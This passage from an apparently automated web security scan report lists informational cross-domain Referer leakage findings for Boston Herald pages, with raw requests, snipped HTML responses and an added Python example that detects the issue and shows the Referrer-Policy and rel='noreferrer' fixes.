<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.286. http://www.bostonherald.com/news/politics/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view.bg

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains (the third-party hosts visible in the response below).
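Findings 17.283 through 17.286 are all the same class of issue, so one check covers them. The Python below is an added example, not code from the crawler or from bostonherald.com: it reproduces the scanner's reasoning (query string in the request URL plus cross-domain links in the response) and shows the two things that make the finding go away, a Referrer-Policy response header or rel="noreferrer" on the outbound link. The sample HTML is a fragment trimmed from the 17.285 response; the rel="noreferrer" on the Twitter link is added here to exercise the mitigated path and was not on the live page. Function and constant names (cross_domain_links, referer_leak, SAMPLE_URL, SAMPLE_HTML) are this example's own.

```python
"""Cross-domain Referer leakage check.

Added example, not part of the CloudScan/Burp crawler or of bostonherald.com.
It reproduces the reasoning behind findings 17.283-17.286: a page fetched with a
query string that links out to other domains lets a browser disclose the full
URL (query string included) in the Referer header when a user follows one of
those links, unless a Referrer-Policy or rel="noreferrer" suppresses it.
Function and constant names below are this example's own.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Tag/attribute pairs that trigger a navigation or subresource fetch, each of
# which carries a Referer header.
_LINK_ATTRS = {
    "a": ("href",), "link": ("href",), "form": ("action",),
    "img": ("src",), "script": ("src",), "iframe": ("src",),
}

# Referrer-Policy values that never send path or query to another origin.
# no-referrer-when-downgrade (the 2011-era default) and unsafe-url send the
# full URL on http->http links, so they are deliberately not listed.
_SAFE_POLICIES = {
    "no-referrer", "same-origin", "origin", "origin-when-cross-origin",
    "strict-origin", "strict-origin-when-cross-origin",
}


class _LinkCollector(HTMLParser):
    """Collects (tag, raw_url, rel) for every outbound reference in the markup."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        for name in _LINK_ATTRS.get(tag, ()):
            url = attrs.get(name)
            if url and not url.lower().startswith(("javascript:", "#", "mailto:")):
                self.links.append((tag, url, (attrs.get("rel") or "").lower()))


def _registrable(host):
    # Crude eTLD+1: last two labels. Adequate for the .com hosts in this report;
    # a production tool should consult the public suffix list instead.
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def cross_domain_links(request_url, html):
    """Return (tag, absolute_url, has_noreferrer) for links to other registrable domains."""
    own = _registrable(urlsplit(request_url).hostname or "")
    collector = _LinkCollector()
    collector.feed(html)
    found = []
    for tag, raw, rel in collector.links:
        absolute = urljoin(request_url, raw)
        host = urlsplit(absolute).hostname or ""
        if host and _registrable(host) != own:
            found.append((tag, absolute, "noreferrer" in rel.split()))
    return found


def referer_leak(request_url, html, response_headers):
    """Classify a request/response pair the way the crawler does.

    Returns (query_string, leaking_urls). leaking_urls is empty when the URL has
    no query string, when the response's Referrer-Policy hides path and query
    cross-origin, or when every cross-domain link carries rel="noreferrer".
    A missing header is treated as leaking, as the scanner does, even though
    current browsers default to strict-origin-when-cross-origin.
    """
    query = urlsplit(request_url).query
    if not query:
        return "", []
    headers = {k.lower(): v for k, v in response_headers.items()}
    if headers.get("referrer-policy", "").strip().lower() in _SAFE_POLICIES:
        return query, []
    return query, [url for _tag, url, noref in cross_domain_links(request_url, html) if not noref]


# Constructed sample: the request URL from finding 17.285 and a fragment trimmed
# from its response. The rel="noreferrer" on the Twitter link is added here to
# exercise the mitigated path; the live page did not carry it.
SAMPLE_URL = "http://www.bostonherald.com/news/politics/view.bg?articleid=1312665&format=email"
SAMPLE_HTML = """
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<noscript><img src="http://b.scorecardresearch.com/b?c1=2&amp;c2=6151562" style="display:none" /></noscript>
<a href="/news/politics/view.bg?articleid=1312665&amp;format=text">Print</a>
<a class="alt" href="javascript:void(0);">Features</a>
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank">Quantcast</a>
<a href="http://twitter.com/bostonherald" rel="noreferrer">Twitter</a>
"""

if __name__ == "__main__":
    query, leaks = referer_leak(SAMPLE_URL, SAMPLE_HTML, {"Server": "Apache"})
    print("query string:", query)
    for url in leaks:
        print("leaks Referer to:", url)
    _, fixed = referer_leak(SAMPLE_URL, SAMPLE_HTML, {"Referrer-Policy": "strict-origin-when-cross-origin"})
    print("with Referrer-Policy set:", len(fixed), "leaking links")
```

Run against the 17.285 response headers above, which carry no Referrer-Policy, the check flags the same-site CDN host cache.heraldinteractive.com along with the analytics and script hosts, because it is a different registrable domain from bostonherald.com; whether that counts as a leak is a judgement the report's "Information" severity leaves to the reader. Note that the articleid and format values in these particular query strings are not sensitive, which is why the crawler rates the finding informational; the same check on a URL carrying a session token or e-mail address would be the one to act on.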

Request

GET /news/politics/view.bg?articleid=1312665&srvc=home&position=comment HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Local Politics - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/politics/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2Fview%2F20110128speaker_deleo_shakes_up_house%2Fsrvc%3Dhome%26position%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div id="bylineArea">
                                        <img class="bylineImage" src="http://cache.heraldinteractive.com/images/siteImages/reporters/HillaryChabot.jpg?1=1" alt="Hillary Chabot" />
                                       <span class="bold">
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312665&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312665&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312665&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(26) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Speaker DeLeo shakes up House');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312665&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(26) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/fbd318_ltpDeleoA012811.jpg" alt="House Speaker Robert DeLeo is seen in..." /></div>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.287. http://www.bostonherald.com/news/regional/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/

Issue detail

The page was loaded from a URL containing a query string, and the response contains links to, and loads resources from, other domains (visible in the snipped response below). When the browser follows one of those links or fetches one of those resources, it sends the page URL, query string included, to the third-party host in the Referer header unless a referrer policy restricts it.

Request

GET /news/regional/?srvc=home&position=4 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:34:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 62211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>
//-->

   <link rel="alternate" title="Local Coverage - News &amp; Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/regional/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a federal marshal."></a>
...[SNIP]...
<a href="/news/regional/view/20110128another_winter_wallop_batters_boston/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg" alt="PILING UP: Crews work to clear mounds of snow in Kenmore Square yesterday."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=loc&position=">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a href="/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=loc&position=">
...[SNIP]...
<a href="/news/regional/view/20110128man_in_collapse_god_was_looking_out_for_us/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/ada04c_Collapse_01282011.jpg" alt="FALLING DOWN: Rescue workers are at the scene where two drivers were trapped in a roof collapse in Lynn yesterday."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/regional/view/20110128man_in_collapse_god_was_looking_out_for_us/srvc=loc&position=">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a href="/news/regional/view/20110128man_in_collapse_god_was_looking_out_for_us/srvc=loc&position=">
...[SNIP]...
<a href="/news/regional/view/20110128crane_elevator_malfunction_keeps_worker_hanging/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/978c86_rescue-01282011.jpg" alt="TRAPPED: Boston firefighters rescue a stranded crane operator from a stuck elevator at the Conley Terminal in South Boston."></a>
...[SNIP]...
<a href="/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/b53b7b_Bryan_01282011.jpg" alt="COURT DISPATCH: Somerville cab driver Tyler Bryan, 25, waits yesterday in Brighton District Court, where he was arraigned on drunken-driving charges."></a>
...[SNIP]...
<a href="/news/regional/view/20110128cops_arrest_drumgold_on_drug_charges/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/af3958_Drumgold_01282011.jpg" alt="Shawn Drumgold"></a>
...[SNIP]...
<a href="/news/regional/view/20110127how_do_you_see_the_state_of_the_union/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/416295_FridayThrowdown0610_315x275.jpg" alt=""></a>
...[SNIP]...
<a href="/news/regional/view/20110128disabled_resident_tells_city_tap_kids_to_shovel/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/817069_Snowride_01282011.jpg" alt="STUCK: Terri Farrell tries to navigate in her scooter along L Street in South Boston. She says she&#x2019;s been forced to stay home because of all the snow."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/regional/view/20110128disabled_resident_tells_city_tap_kids_to_shovel/srvc=loc&position=">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a href="/news/regional/view/20110128disabled_resident_tells_city_tap_kids_to_shovel/srvc=loc&position=">
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312665"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" alt="Local Politics" /></a>
...[SNIP]...
</div>    


<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</h1>
                    <img style="width:50px; height:50px; padding:5px; background-color:#ddd; border:none" src="http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif" alt="Howie Carr" />
                <div class="byline">
...[SNIP]...
<div style="margin:0 0 20px 0; line-height:16px; width:310px">
<img style="float:left; margin:0 5px 0 0; clear:both" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif">
<span class="bold">
...[SNIP]...
<a href="/news/police_logs/">
<img style="float:left; margin:2px 5px 0 0; clear:both" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" >
<div style="overflow:hidden; height:57px; max-height:57px">
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&amp;width=300&amp;height=300&amp;header=true&amp;colorscheme=light&amp;font&amp;border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.288. http://www.bostonherald.com/news/regional/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The page was loaded from a URL containing a query string, and the response contains links to, and loads resources from, other domains (visible in the snipped response below). When the browser follows one of those links or fetches one of those resources, it sends the page URL, query string included, to the third-party host in the Referer header unless a referrer policy restricts it.

Request

GET /news/regional/view.bg?articleid=1312541&format=email HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:39:25 GMT
Server: Apache
